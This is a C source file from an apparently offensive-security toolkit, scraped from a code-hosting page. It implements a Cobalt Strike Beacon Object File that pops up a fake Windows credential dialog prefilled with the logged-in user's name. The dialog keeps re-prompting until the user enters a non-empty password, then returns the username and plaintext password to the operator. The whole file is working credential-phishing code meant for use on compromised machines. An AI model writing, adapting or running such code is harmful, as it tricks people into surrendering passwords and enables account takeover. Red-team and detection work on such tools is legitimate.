Startseite Erkunden Hilfe
Anmelden
zhensolid
/
OperatorsKit
1
0
Fork 0
Dateien Issues 0 Pull-Requests 0 Wiki
Branch: main
Branches Tags
OperatorsKit
/
KIT
/
CredPrompt
/
credprompt.c

credprompt.c 8.2 KB
Permalink Verlauf Originalformat

123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137138139140141142143144145146147148149150151152153154155156157158159160161162163164165166167168169170171172173174175176177178179180181182183184185186187188189190191192193194195196197198199200201202203204205206207208209210211212213214215216217218219220221222223224225226227228229230231232233234235236237238239240241242243244245246247248249250251252253254255256257258259260261262263264265266 
  1. #define SECURITY_WIN32
    2. 

  2. 

  3. #include <stdio.h>
    4. 

  4. #include <windows.h>
    5. 

  5. #include <wincred.h>
    6. 

  6. #include <Lmcons.h>
    7. 

  7. #include <security.h>
    8. 

  8. #include "credprompt.h"
    9. 

  9. #include "beacon.h"
    10. 

  10. 

  11. #pragma comment(lib, "Secur32.lib")
    12. 

  12. #pragma comment(lib, "credui.lib")
    13. 

  13. #pragma comment(lib, "ole32.lib")
    14. 

  14. #pragma comment(lib, "user32.lib")
    15. 

  15. 

  16. typedef struct {
    17. 

  17.     UINT timeout;
    18. 

  18.     HANDLE hTimeoutEvent;
    19. 

  19. } TIMEOUT_STRUCT;
    20. 

  20. 

  21. 

  22. 

  23. //START TrustedSec BOF print code: https://github.com/trustedsec/CS-Situational-Awareness-BOF/blob/master/src/common/base.c
    24. 

  24. #ifndef bufsize
    25. 

  25. #define bufsize 8192
    26. 

  26. #endif
    27. 

  27. char *output = 0;  
    28. 

  28. WORD currentoutsize = 0;
    29. 

  29. HANDLE trash = NULL; 
    30. 

  30. int bofstart();
    31. 

  31. void internal_printf(const char* format, ...);
    32. 

  32. void printoutput(BOOL done);
    33. 

  33. 

  34. int bofstart() {   
    35. 

  35.     output = (char*)MSVCRT$calloc(bufsize, 1);
    36. 

  36.     currentoutsize = 0;
    37. 

  37.     return 1;
    38. 

  38. }
    39. 

  39. 

  40. void internal_printf(const char* format, ...){
    41. 

  41.     int buffersize = 0;
    42. 

  42.     int transfersize = 0;
    43. 

  43.     char * curloc = NULL;
    44. 

  44.     char* intBuffer = NULL;
    45. 

  45.     va_list args;
    46. 

  46.     va_start(args, format);
    47. 

  47.     buffersize = MSVCRT$vsnprintf(NULL, 0, format, args); 
    48. 

  48.     va_end(args);
    49. 

  49.     
    50. 

  50.     if (buffersize == -1) return;
    51. 

  51.     
    52. 

  52.     char* transferBuffer = (char*)KERNEL32$HeapAlloc(KERNEL32$GetProcessHeap(), HEAP_ZERO_MEMORY, bufsize);
    53. 

  53. 	intBuffer = (char*)KERNEL32$HeapAlloc(KERNEL32$GetProcessHeap(), HEAP_ZERO_MEMORY, buffersize);
    54. 

  54.     va_start(args, format);
    55. 

  55.     MSVCRT$vsnprintf(intBuffer, buffersize, format, args); 
    56. 

  56.     va_end(args);
    57. 

  57.     if(buffersize + currentoutsize < bufsize) 
    58. 

  58.     {
    59. 

  59.         MSVCRT$memcpy(output+currentoutsize, intBuffer, buffersize);
    60. 

  60.         currentoutsize += buffersize;
    61. 

  61.     } else {
    62. 

  62.         curloc = intBuffer;
    63. 

  63.         while(buffersize > 0)
    64. 

  64.         {
    65. 

  65.             transfersize = bufsize - currentoutsize;
    66. 

  66.             if(buffersize < transfersize) 
    67. 

  67.             {
    68. 

  68.                 transfersize = buffersize;
    69. 

  69.             }
    70. 

  70.             MSVCRT$memcpy(output+currentoutsize, curloc, transfersize);
    71. 

  71.             currentoutsize += transfersize;
    72. 

  72.             if(currentoutsize == bufsize)
    73. 

  73.             {
    74. 

  74.                 printoutput(FALSE); 
    75. 

  75.             }
    76. 

  76.             MSVCRT$memset(transferBuffer, 0, transfersize); 
    77. 

  77.             curloc += transfersize; 
    78. 

  78.             buffersize -= transfersize;
    79. 

  79.         }
    80. 

  80.     }
    81. 

  81. 	KERNEL32$HeapFree(KERNEL32$GetProcessHeap(), 0, intBuffer);
    82. 

  82. 	KERNEL32$HeapFree(KERNEL32$GetProcessHeap(), 0, transferBuffer);
    83. 

  83. }
    84. 

  84. 

  85. void printoutput(BOOL done) {
    86. 

  86.     char * msg = NULL;
    87. 

  87.     BeaconOutput(CALLBACK_OUTPUT, output, currentoutsize);
    88. 

  88.     currentoutsize = 0;
    89. 

  89.     MSVCRT$memset(output, 0, bufsize);
    90. 

  90.     if(done) {MSVCRT$free(output); output=NULL;}
    91. 

  91. }
    92. 

  92. //END TrustedSec BOF print code.
    93. 

  93. 

  94. 

  95. 

  96. BOOL is_empty_or_whitespace(WCHAR *str) {
    97. 

  97.     if (str == NULL) {
    98. 

  98.         return TRUE;
    99. 

  99.     }
    100. 

  100. 

  101.     while (*str) {
    102. 

  102.         if (!MSVCRT$iswspace(*str)) {
    103. 

  103.             return FALSE;
    104. 

  104.         }
    105. 

  105.         str++;
    106. 

  106.     }
    107. 

  107.     return TRUE;
    108. 

  108. }
    109. 

  109. 

  110. 

  111. BOOL CALLBACK EnumWindowsProc(HWND hWnd, LPARAM lParam) {
    112. 

  112.     WCHAR className[256] = {0};
    113. 

  113.     USER32$GetClassNameW(hWnd, className, sizeof(className) / sizeof(WCHAR));
    114. 

  114. 

  115.     if (MSVCRT$wcscmp(className, L"Credential Dialog Xaml Host") == 0) {
    116. 

  116.         USER32$PostMessageW(hWnd, WM_CLOSE, 0, 0);
    117. 

  117.         return FALSE;
    118. 

  118.     }
    119. 

  119. 

  120.     return TRUE;
    121. 

  121. }
    122. 

  122. 

  123. 

  124. DWORD WINAPI PromptWithTimeout(LPVOID lParam) {
    125. 

  125.     TIMEOUT_STRUCT *pTimeoutStruct = (TIMEOUT_STRUCT *)lParam;
    126. 

  126.     UINT timeout = pTimeoutStruct->timeout;
    127. 

  127.     HANDLE hTimeoutEvent = pTimeoutStruct->hTimeoutEvent;
    128. 

  128. 

  129.     KERNEL32$Sleep(timeout * 1000);
    130. 

  130.     USER32$EnumWindows(EnumWindowsProc, 0);
    131. 

  131.     KERNEL32$SetEvent(hTimeoutEvent);
    132. 

  132. 

  133.     return 0;
    134. 

  134. }
    135. 

  135. 

  136. 

  137. BOOL PromptForCreds(LPWSTR title, LPWSTR message, LPWSTR *username, LPWSTR *password, LPWSTR *domain, UINT timeout)
    138. 

  138. {
    139. 

  139.     PVOID packed_credentials = NULL;
    140. 

  140.     ULONG packed_credentials_size = 0;
    141. 

  141. 	
    142. 

  142. 	HANDLE hTimeoutEvent = KERNEL32$CreateEventW(NULL, TRUE, FALSE, NULL);
    143. 

  143. 

  144.     // Get current username in DOMAIN\USERNAME format
    145. 

  145.     WCHAR domainUsername[DNLEN + UNLEN + 2];
    146. 

  146.     ULONG nSize = sizeof(domainUsername) / sizeof(WCHAR);
    147. 

  147.     if (SECUR32$GetUserNameExW(NameSamCompatible, domainUsername, &nSize)) {
    148. 

  148.         // Pack current username
    149. 

  149.         WCHAR prefilled_username[DNLEN + UNLEN + 2];
    150. 

  150.         MSVCRT$_snwprintf(prefilled_username, (sizeof(prefilled_username) / sizeof(WCHAR)) - 1, L"%s", domainUsername);
    151. 

  151. 

  152.         CREDUI$CredPackAuthenticationBufferW(0, prefilled_username, L"", NULL, &packed_credentials_size);
    153. 

  153.         packed_credentials = MSVCRT$malloc(packed_credentials_size);
    154. 

  154.         CREDUI$CredPackAuthenticationBufferW(0, prefilled_username, L"", (PBYTE)packed_credentials, &packed_credentials_size);
    155. 

  155.     }
    156. 

  156. 	
    157. 

  157.     BOOL bValidPassword = FALSE;
    158. 

  158.     DWORD result;
    159. 

  159. 	
    160. 

  160. 	TIMEOUT_STRUCT timeoutStruct;
    161. 

  161. 	timeoutStruct.timeout = timeout;
    162. 

  162. 	timeoutStruct.hTimeoutEvent = hTimeoutEvent;
    163. 

  163. 

  164. 	DWORD threadId;
    165. 

  165. 	HANDLE hThread = KERNEL32$CreateThread(NULL, 0, PromptWithTimeout, (LPVOID)&timeoutStruct, 0, &threadId);
    166. 

  166. 	
    167. 

  167. 	internal_printf("\nPrompt event log:\n");
    168. 

  168. 	internal_printf("==============================================\n");
    169. 

  169. 	
    170. 

  170.     do {
    171. 

  171.         // Prompt for credentials
    172. 

  172.         CREDUI_INFOW credui_info = {0};
    173. 

  173.         credui_info.cbSize = sizeof(credui_info);
    174. 

  174.         credui_info.pszCaptionText = title;
    175. 

  175.         credui_info.pszMessageText = message;
    176. 

  176. 		credui_info.hwndParent = NULL;
    177. 

  177. 		
    178. 

  178. 		HWND hWnd = USER32$GetForegroundWindow();
    179. 

  179. 		if (hWnd != NULL) {
    180. 

  180. 			credui_info.hwndParent = hWnd;
    181. 

  181. 		}
    182. 

  182. 

  183.         DWORD auth_package = 0;
    184. 

  184.         BOOL save_credentials = FALSE;
    185. 

  185.         ULONG out_credentials_size = 0;
    186. 

  186.         LPVOID out_credentials = NULL;
    187. 

  187. 

  188.         result = CREDUI$CredUIPromptForWindowsCredentialsW(&credui_info, 0, &auth_package, packed_credentials, packed_credentials_size, &out_credentials, &out_credentials_size, &save_credentials, CREDUIWIN_GENERIC | CREDUIWIN_CHECKBOX);
    189. 

  189. 

  190.         if (result == NO_ERROR)
    191. 

  191.         {
    192. 

  192.             *username = (LPWSTR)MSVCRT$malloc(CREDUI_MAX_USERNAME_LENGTH * sizeof(WCHAR));
    193. 

  193.             *password = (LPWSTR)MSVCRT$malloc(CREDUI_MAX_USERNAME_LENGTH * sizeof(WCHAR));
    194. 

  194.             *domain = (LPWSTR)MSVCRT$malloc(CREDUI_MAX_USERNAME_LENGTH * sizeof(WCHAR));
    195. 

  195. 

  196.             ULONG max_username = CREDUI_MAX_USERNAME_LENGTH;
    197. 

  197.             ULONG max_password = CREDUI_MAX_USERNAME_LENGTH;
    198. 

  198.             ULONG max_domain = CREDUI_MAX_USERNAME_LENGTH;
    199. 

  199.             CREDUI$CredUnPackAuthenticationBufferW(0, out_credentials, out_credentials_size, *username, &max_username, *domain, &max_domain, *password, &max_password);
    200. 

  200. 	
    201. 

  201.             bValidPassword = !is_empty_or_whitespace(*password);
    202. 

  202.             if (!bValidPassword) {
    203. 

  203.                 internal_printf("[!] User tried to enter empty password\n");
    204. 

  204.             }
    205. 

  205.             MSVCRT$memset(out_credentials, 0, out_credentials_size);
    206. 

  206.             OLE32$CoTaskMemFree(out_credentials);
    207. 

  207. 		}
    208. 

  208. 		
    209. 

  209. 		else {
    210. 

  210. 			if (KERNEL32$WaitForSingleObject(hTimeoutEvent, 0) == WAIT_OBJECT_0) {
    211. 

  211. 				internal_printf("[!] Credential prompt timed out\n");
    212. 

  212. 				break;
    213. 

  213. 				
    214. 

  214. 			} else {
    215. 

  215. 				internal_printf("[!] User tried to close the prompt\n");
    216. 

  216. 			}
    217. 

  217. 		}
    218. 

  218. 	} while (!bValidPassword);
    219. 

  219. 	
    220. 

  220. 	KERNEL32$TerminateThread(hThread, 0);
    221. 

  221. 	KERNEL32$CloseHandle(hThread);
    222. 

  222. 	
    223. 

  223. 	if (packed_credentials)
    224. 

  224. 	{
    225. 

  225. 	MSVCRT$memset(packed_credentials, 0, packed_credentials_size);
    226. 

  226. 		MSVCRT$free(packed_credentials);
    227. 

  227. 	}
    228. 

  228. 

  229. 	return bValidPassword;
    230. 

  230. }
    231. 

  231. 

  232. 

  233. int go(char *args, int len) {
    234. 

  234. 	LPWSTR title = L"";
    235. 

  235. 	LPWSTR message = L"";
    236. 

  236.     LPWSTR username = NULL;
    237. 

  237.     LPWSTR password = NULL;
    238. 

  238. 	LPWSTR domain = NULL;
    239. 

  239.     UINT timer_seconds = 60;
    240. 

  240. 	datap parser;
    241. 

  241. 	
    242. 

  242. 	BeaconDataParse(&parser, args, len);
    243. 

  243. 	title = BeaconDataExtract(&parser, NULL);
    244. 

  244. 	message = BeaconDataExtract(&parser, NULL);
    245. 

  245. 	timer_seconds = BeaconDataInt(&parser, NULL);
    246. 

  246. 	if(!bofstart()) return;
    247. 

  247. 	
    248. 

  248. 	
    249. 

  249.     if (PromptForCreds(title, message, &username, &password, &domain, timer_seconds))
    250. 

  250. 	{
    251. 

  251.         internal_printf("[+] Entered credentials by user:\n\tUsername: %ls\n\tPassword: %ls\n", username, password);
    252. 

  252. 		printoutput(TRUE);
    253. 

  253. 		
    254. 

  254. 		MSVCRT$memset(password, 0, MSVCRT$wcslen(password) * sizeof(WCHAR));
    255. 

  255.         MSVCRT$free(username);
    256. 

  256.         MSVCRT$free(password);
    257. 

  257.         MSVCRT$free(domain);
    258. 

  258.     }
    259. 

  259.     else
    260. 

  260.     {
    261. 

  261. 		printoutput(TRUE);
    262. 

  262.     }
    263. 

  263. 

  264.     return 0;
    265. 

  265. }
    266. 

  266.